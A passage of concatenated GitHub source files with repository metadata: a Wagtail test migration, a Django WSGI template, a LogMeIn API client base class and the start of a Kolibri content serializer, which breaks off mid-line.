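# Example configuration.yaml entry (a sketch based on PLATFORM_SCHEMA above;
# the selected resources are illustrative):
#     sensor:
#       - platform: fitbit
#         clock_format: 24H
#         monitored_resources:
#           - activities/steps
#           - sleep/minutesAsleep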
| {
"content_hash": "e1d380eefbe191d624299ca33f7292e5",
"timestamp": "",
"source": "github",
"line_count": 490,
"max_line_length": 79,
"avg_line_length": 38.8734693877551,
"alnum_prop": 0.5831058378832423,
"repo_name": "ewandor/home-assistant",
"id": "35748b30ecf4bb65c2e89c8c1ee5130616a35d18",
"size": "19048",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/sensor/fitbit.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "8860790"
},
{
"name": "Ruby",
"bytes": "517"
},
{
"name": "Shell",
"bytes": "12639"
}
],
"symlink_target": ""
} |
default_app_config = 'django_pph.apps.DjangoPPHAppConfig'
| {
"content_hash": "31ecef20a677e640eb9e142637bce9e1",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 57,
"avg_line_length": 58,
"alnum_prop": 0.8103448275862069,
"repo_name": "PolyPasswordHasher/PolyPasswordHasher-Django",
"id": "16f2f887b4a2805faf09f321ee506c847bed6937",
"size": "58",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_pph/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "71747"
}
],
"symlink_target": ""
} |
import django.db.models.deletion
import modelcluster.contrib.taggit
import modelcluster.fields
import taggit.managers
from django.conf import settings
from django.db import migrations, models
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.images.blocks
import wagtail.images.models
import wagtail.search.index
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('wagtailimages', '0010_change_on_delete_behaviour'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('wagtailcore', '0024_alter_page_content_type_on_delete_behaviour'),
('taggit', '0002_auto_20150616_2121'),
('wagtaildocs', '0005_alter_uploaded_by_user_on_delete_action'),
]
operations = [
migrations.CreateModel(
name='Advert',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField(blank=True, null=True)),
('text', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AdvertPlacement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('colour', models.CharField(max_length=255)),
('advert', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='tests.Advert')),
],
),
migrations.CreateModel(
name='AdvertTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_object', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='tagged_items', to='tests.Advert')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tests_adverttag_items', to='taggit.Tag')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='AdvertWithTabbedInterface',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('url', models.URLField(blank=True, null=True)),
('text', models.CharField(max_length=255)),
('something_else', models.CharField(max_length=255)),
],
),
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80, unique=True)),
],
),
migrations.CreateModel(
name='BlogCategoryBlogPage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='tests.BlogCategory')),
],
),
migrations.CreateModel(
name='BusinessChild',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BusinessIndex',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BusinessNowherePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='BusinessSubIndex',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='CustomImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='title')),
('file', models.ImageField(height_field='height', upload_to=wagtail.images.models.get_upload_to, verbose_name='file', width_field='width')),
('width', models.IntegerField(editable=False, verbose_name='width')),
('height', models.IntegerField(editable=False, verbose_name='height')),
('created_at', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created at')),
('focal_point_x', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_y', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_width', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_height', models.PositiveIntegerField(blank=True, null=True)),
('file_size', models.PositiveIntegerField(editable=False, null=True)),
('caption', models.CharField(max_length=255)),
('not_editable_field', models.CharField(max_length=255)),
('tags', taggit.managers.TaggableManager(blank=True, help_text=None, through='taggit.TaggedItem', to='taggit.Tag', verbose_name='tags')),
('uploaded_by_user', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='uploaded by user')),
],
options={
'abstract': False,
},
bases=(models.Model, wagtail.search.index.Indexed),
),
migrations.CreateModel(
name='CustomImageFilePath',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255, verbose_name='title')),
('file', models.ImageField(height_field='height', upload_to=wagtail.images.models.get_upload_to, verbose_name='file', width_field='width')),
('width', models.IntegerField(editable=False, verbose_name='width')),
('height', models.IntegerField(editable=False, verbose_name='height')),
('created_at', models.DateTimeField(auto_now_add=True, db_index=True, verbose_name='created at')),
('focal_point_x', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_y', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_width', models.PositiveIntegerField(blank=True, null=True)),
('focal_point_height', models.PositiveIntegerField(blank=True, null=True)),
('file_size', models.PositiveIntegerField(editable=False, null=True)),
('tags', taggit.managers.TaggableManager(blank=True, help_text=None, through='taggit.TaggedItem', to='taggit.Tag', verbose_name='tags')),
('uploaded_by_user', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='uploaded by user')),
],
options={
'abstract': False,
},
bases=(models.Model, wagtail.search.index.Indexed),
),
migrations.CreateModel(
name='CustomManagerPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventIndex',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('intro', wagtail.core.fields.RichTextField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('date_from', models.DateField(null=True, verbose_name='Start date')),
('date_to', models.DateField(blank=True, help_text='Not required if event is on a single day', null=True, verbose_name='End date')),
('time_from', models.TimeField(blank=True, null=True, verbose_name='Start time')),
('time_to', models.TimeField(blank=True, null=True, verbose_name='End time')),
('audience', models.CharField(choices=[('public', 'Public'), ('private', 'Private')], max_length=255)),
('location', models.CharField(max_length=255)),
('body', wagtail.core.fields.RichTextField(blank=True)),
('cost', models.CharField(max_length=255)),
('signup_link', models.URLField(blank=True)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='EventPageCarouselItem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
('caption', models.CharField(blank=True, max_length=255)),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='EventPageChooserModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='EventPageRelatedLink',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('title', models.CharField(help_text='Link title', max_length=255)),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='EventPageSpeaker',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('link_external', models.URLField(blank=True, verbose_name='External link')),
('first_name', models.CharField(blank=True, max_length=255, verbose_name='Name')),
('last_name', models.CharField(blank=True, max_length=255, verbose_name='Surname')),
('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='FilePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('file_field', models.FileField(upload_to='')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='FormField',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
('label', models.CharField(help_text='The label of the form field', max_length=255, verbose_name='label')),
('field_type', models.CharField(choices=[('singleline', 'Single line text'), ('multiline', 'Multi-line text'), ('email', 'Email'), ('number', 'Number'), ('url', 'URL'), ('checkbox', 'Checkbox'), ('checkboxes', 'Checkboxes'), ('dropdown', 'Drop down'), ('radio', 'Radio buttons'), ('date', 'Date'), ('datetime', 'Date/time')], max_length=16, verbose_name='field type')),
('required', models.BooleanField(default=True, verbose_name='required')),
('choices', models.TextField(blank=True, help_text='Comma separated list of choices. Only applicable in checkboxes, radio and dropdown.', verbose_name='choices')),
('default_value', models.CharField(blank=True, help_text='Default value. Comma separated values supported for checkboxes.', max_length=255, verbose_name='default value')),
('help_text', models.CharField(blank=True, max_length=255, verbose_name='help text')),
],
options={
'ordering': ['sort_order'],
'abstract': False,
},
),
migrations.CreateModel(
name='FormPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('to_address', models.CharField(blank=True, help_text='Optional - form submissions will be emailed to these addresses. Separate multiple addresses by comma.', max_length=255, verbose_name='to address')),
('from_address', models.CharField(blank=True, max_length=255, verbose_name='from address')),
('subject', models.CharField(blank=True, max_length=255, verbose_name='subject')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='GenericSnippetPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('snippet_object_id', models.PositiveIntegerField(null=True)),
('snippet_content_type', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='contenttypes.ContentType')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='IconSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('site', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Site')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ManyToManyBlogPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.RichTextField(blank=True)),
('adverts', models.ManyToManyField(blank=True, to='tests.Advert')),
('blog_categories', models.ManyToManyField(blank=True, through='tests.BlogCategoryBlogPage', to='tests.BlogCategory')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MTIBasePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'verbose_name': 'MTI Base page',
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MyCustomPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='NotYetRegisteredSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('site', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Site')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='PageChooserModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='PageWithOldStyleRouteMethod',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('content', models.TextField()),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SimplePage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('content', models.TextField()),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SingletonPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='SnippetChooserModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('advert', models.ForeignKey(help_text='help text', on_delete=django.db.models.deletion.CASCADE, to='tests.Advert')),
],
),
migrations.CreateModel(
name='StandardChild',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='StandardIndex',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='StreamModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('body', wagtail.core.fields.StreamField((('text', wagtail.core.blocks.CharBlock()), ('rich_text', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())))),
],
),
migrations.CreateModel(
name='StreamPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.core.fields.StreamField((('text', wagtail.core.blocks.CharBlock()), ('rich_text', wagtail.core.blocks.RichTextBlock()), ('image', wagtail.images.blocks.ImageChooserBlock())))),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='TaggedPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='TaggedPageTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_object', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='tagged_items', to='tests.TaggedPage')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tests_taggedpagetag_items', to='taggit.Tag')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TestSetting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('email', models.EmailField(max_length=50)),
('site', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Site')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ValidatedPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('foo', models.CharField(max_length=255)),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.CreateModel(
name='MTIChildPage',
fields=[
('mtibasepage_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='tests.MTIBasePage')),
],
options={
'abstract': False,
},
bases=('tests.mtibasepage',),
),
migrations.CreateModel(
name='SingleEventPage',
fields=[
('eventpage_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='tests.EventPage')),
('excerpt', models.TextField(blank=True, help_text='Short text to describe what is this action about', max_length=255, null=True)),
],
options={
'abstract': False,
},
bases=('tests.eventpage',),
),
migrations.AddField(
model_name='taggedpage',
name='tags',
field=modelcluster.contrib.taggit.ClusterTaggableManager(blank=True, help_text='A comma-separated list of tags.', through='tests.TaggedPageTag', to='taggit.Tag', verbose_name='Tags'),
),
migrations.AddField(
model_name='pagechoosermodel',
name='page',
field=models.ForeignKey(help_text='help text', on_delete=django.db.models.deletion.CASCADE, to='wagtailcore.Page'),
),
migrations.AddField(
model_name='formfield',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='form_fields', to='tests.FormPage'),
),
migrations.AddField(
model_name='eventpagespeaker',
name='link_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='eventpagespeaker',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='speakers', to='tests.EventPage'),
),
migrations.AddField(
model_name='eventpagerelatedlink',
name='link_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='eventpagerelatedlink',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='tests.EventPage'),
),
migrations.AddField(
model_name='eventpagechoosermodel',
name='page',
field=models.ForeignKey(help_text='more help text', on_delete=django.db.models.deletion.CASCADE, to='tests.EventPage'),
),
migrations.AddField(
model_name='eventpagecarouselitem',
name='link_page',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='eventpagecarouselitem',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='tests.EventPage'),
),
migrations.AddField(
model_name='eventpage',
name='feed_image',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image'),
),
migrations.AddField(
model_name='blogcategoryblogpage',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='categories', to='tests.ManyToManyBlogPage'),
),
migrations.AddField(
model_name='advertplacement',
name='page',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='advert_placements', to='wagtailcore.Page'),
),
migrations.AddField(
model_name='advert',
name='tags',
field=taggit.managers.TaggableManager(blank=True, help_text='A comma-separated list of tags.', through='tests.AdvertTag', to='taggit.Tag', verbose_name='Tags'),
),
]
| {
"content_hash": "6b4736973d53cba2c7e9f2ef6bec066a",
"timestamp": "",
"source": "github",
"line_count": 584,
"max_line_length": 385,
"avg_line_length": 51.87328767123287,
"alnum_prop": 0.5730177592922691,
"repo_name": "nealtodd/wagtail",
"id": "032928e6ea38ee6079770a63ba64fc6f498b7f4f",
"size": "30366",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "wagtail/tests/testapp/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "190511"
},
{
"name": "Dockerfile",
"bytes": "703"
},
{
"name": "HTML",
"bytes": "371011"
},
{
"name": "JavaScript",
"bytes": "262163"
},
{
"name": "Makefile",
"bytes": "992"
},
{
"name": "Python",
"bytes": "3564287"
},
{
"name": "Shell",
"bytes": "8289"
}
],
"symlink_target": ""
} |
"""
WSGI config for MyProject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
{% if cookiecutter.heroku_deployment_method != 'none' %}from whitenoise.django import DjangoWhiteNoise{% endif %}
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings")
application = get_wsgi_application()
{% if cookiecutter.heroku_deployment_method != 'none' %}application = DjangoWhiteNoise(application){% endif %}
| {
"content_hash": "3ac04c08d5058d8186c3612d417480c3",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 113,
"avg_line_length": 36.294117647058826,
"alnum_prop": 0.766612641815235,
"repo_name": "tamj0rd2/cookiecutter-drfreact",
"id": "20d9a9d2ebedd34ab61b1799848f0362261e0174",
"size": "617",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "{{ cookiecutter.project_slug }}/config/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "268"
},
{
"name": "JavaScript",
"bytes": "4739"
},
{
"name": "Python",
"bytes": "9241"
}
],
"symlink_target": ""
} |
import json
import logging
import os
# Requests
import requests
from requests.structures import CaseInsensitiveDict
__all__ = []
logger = logging.getLogger('lmiapi.public')
class LogMeInPublicAPIBase(object):
API_ROOT = None
def __init__(self, creds):
assert self.API_ROOT
self.creds = self._check_creds(creds)
self.session = requests.Session()
self.session.headers.update({'Accept': 'application/JSON'})
self.session.headers.update({'Authorization': json.dumps(self.creds)})
def _check_creds(self, creds):
d = CaseInsensitiveDict()
if isinstance(creds, dict):
d.update(creds)
elif isinstance(creds, basestring):
if os.path.exists(creds):
creds = file(creds, 'r').read()
for line in creds.splitlines():
if ':' in line:
k, v = line.split(':', 1)
d[k.strip()] = v.strip()
else:
raise TypeError('unsupported type for credentials data')
if 'companyId' not in d and 'CID' in d:
d['companyId'] = d['CID']
if 'companyId' in d and 'psk' not in d:
raise ValueError('psk is required when companyId is provided')
elif 'psk' in d and 'companyId' not in d:
raise ValueError('companyId is required when psk is provided')
elif 'companyId' in d and 'psk' in d:
return {
'companyId': int(d['companyId']),
'psk': str(d['psk']),
}
elif 'loginSessionId' in d and 'profileId' not in d:
raise ValueError('profileId is required when loginSessionId is '
'provided')
elif 'profileId' in d and 'loginSessionId' not in d:
raise ValueError('loginSessionId is required when profileId is '
'provided')
elif 'loginSessionId' in d and 'profileId' in d:
return {
'loginSessionId': str(d['loginSessionId']),
'profileId': int(d['profileId']),
}
else:
raise ValueError('either companyId+psk or '
'loginSessionId+profileId must be provided')
def _get(self, path, v1=False):
api_root = self.API_ROOT.replace('/v2/', '/v1/') if v1 else self.API_ROOT
url = '{}{}'.format(api_root, path.lstrip('/'))
response = self.session.get(url)
logger.debug('GET %s -> %d', url, response.status_code)
response.raise_for_status()
if response.status_code != 204:
return response.json()
def _post(self, path, data=None, v1=False):
api_root = self.API_ROOT.replace('/v2/', '/v1/') if v1 else self.API_ROOT
url = '{}{}'.format(api_root, path.lstrip('/'))
if data:
headers = {'Content-Type': 'application/JSON'}
data = json.dumps(data)
else:
headers = {}
data = None
response = self.session.post(url, data=data, headers=headers)
logger.debug('POST %s -> %d', url, response.status_code)
response.raise_for_status()
if response.status_code != 204:
return response.json()
def _put(self, path, data, v1=False):
api_root = self.API_ROOT.replace('/v2/', '/v1/') if v1 else self.API_ROOT
url = '{}{}'.format(api_root, path.lstrip('/'))
headers = {'Content-Type': 'application/JSON'}
data = json.dumps(data)
response = self.session.put(url, data=data, headers=headers)
logger.debug('PUT %s -> %d', url, response.status_code)
response.raise_for_status()
if response.status_code != 204:
return response.json()
def _delete(self, path, data=None, v1=False):
api_root = self.API_ROOT.replace('/v2/', '/v1/') if v1 else self.API_ROOT
url = '{}{}'.format(api_root, path.lstrip('/'))
if data:
headers = {'Content-Type': 'application/JSON'}
data = json.dumps(data)
else:
headers = {}
data = None
response = self.session.delete(url, data=data, headers=headers)
logger.debug('DELETE %s -> %d', url, response.status_code)
response.raise_for_status()
if response.status_code != 204:
return response.json()
def authentication(self):
return self._get('/authentication')
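# Illustrative sketch (not part of the original module): a minimal subclass
# showing how the base class above is meant to be used. The API root URL is a
# placeholder assumption, not a real LogMeIn endpoint.
class _ExamplePublicAPI(LogMeInPublicAPIBase):
    API_ROOT = 'https://example.invalid/public-api/v2/'
# Credentials may be a dict, a "key: value" multi-line string, or a path to a
# file containing such lines, e.g.:
#     api = _ExamplePublicAPI({'companyId': 123, 'psk': 'secret'})
#     api.authentication()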
| {
"content_hash": "16f57295e2b6f5a3dea3b36f010cb036",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 81,
"avg_line_length": 38.71304347826087,
"alnum_prop": 0.5559299191374663,
"repo_name": "ninemoreminutes/lmiapi",
"id": "98488dd33bda6937fcebfe11bb87da45f40b2eda",
"size": "4461",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lmiapi/public.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "836"
},
{
"name": "Python",
"bytes": "33393"
}
],
"symlink_target": ""
} |
import uuid
from django.db.models import Case
from django.db.models import When
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import viewsets
from rest_framework.exceptions import ParseError
from rest_framework.response import Response
from rest_framework.serializers import ValidationError
from rest_framework.views import APIView
from kolibri.core.content.api import ChannelMetadataFilter
from kolibri.core.content.models import ChannelMetadata
from kolibri.core.content.models import ContentNode
from kolibri.core.content.permissions import CanManageContent
from kolibri.core.content.serializers import ChannelMetadataSerializer
from kolibri.core.content.utils.annotation import total_file_size
from kolibri.core.content.utils.content_types_tools import (
renderable_contentnodes_without_topics_q_filter,
)
from kolibri.core.content.utils.file_availability import LocationError
from kolibri.core.content.utils.import_export_content import get_import_export_data
from kolibri.core.content.utils.upgrade import CHANNEL_UPDATE_STATS_CACHE_KEY
from kolibri.core.device.models import ContentCacheKey
from kolibri.core.utils.cache import process_cache
class DeviceChannelMetadataSerializer(ChannelMetadataSerializer):
def to_representation(self, instance):
value = super(ChannelMetadataSerializer, self).to_representation(instance)
# if the request includes a GET param 'include_fields', add the requested calculated fields
if "request" in self.context:
include_fields = (
self.context["request"].GET.get("include_fields", "").split(",")
)
if include_fields:
# build querysets for the full set of channel nodes, as well as those that are unrenderable
channel_nodes = ContentNode.objects.filter(channel_id=instance.id)
unrenderable_nodes = channel_nodes.exclude(
renderable_contentnodes_without_topics_q_filter
)
if "total_resources" in include_fields:
# count the total number of renderable non-topic resources in the channel
# (note: it's faster to count them all and then subtract the unrenderables, of which there are fewer)
value["total_resources"] = (
channel_nodes.count() - unrenderable_nodes.count()
)
if "total_file_size" in include_fields:
# count the total file size of files associated with renderable content nodes
# (note: it's faster to count them all and then subtract the unrenderables, of which there are fewer)
value["total_file_size"] = total_file_size(
channel_nodes
) - total_file_size(unrenderable_nodes)
if "on_device_resources" in include_fields:
# read the precalculated total number of resources from the channel already available
value["on_device_resources"] = instance.total_resource_count
if "on_device_file_size" in include_fields:
# read the precalculated total size of available files associated with the channel
value["on_device_file_size"] = instance.published_size
new_resource_stats = process_cache.get(
